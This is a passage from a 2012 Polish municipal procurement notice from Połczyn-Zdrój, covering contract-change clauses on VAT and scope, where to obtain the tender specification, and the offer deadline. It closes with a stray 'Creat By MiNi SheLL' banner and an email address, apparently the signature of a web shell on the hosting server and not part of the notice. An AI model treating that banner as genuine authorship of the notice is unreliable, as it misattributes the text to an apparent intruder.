   - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania  
    umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia
    wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego 
    przez Wykonawcę,
  - jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania  
   umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia
    wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia   
    przez Wykonawcę,
h) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy. W takim
   przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, 
   przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz     
   udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z    
   umowy planowanymi świadczeniami.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które 
Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do 
wyrażenia takiej zgody.
Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy   
  (np. zmiana nr rachunku bankowego),
b) zmiany danych tele-adresowych, zmiany osób wskazanych do kontaktów między
   Stronami,
c) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach
    publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polczyn-zdroj.pl/bip/zamówienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 11:00, miejsce: Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com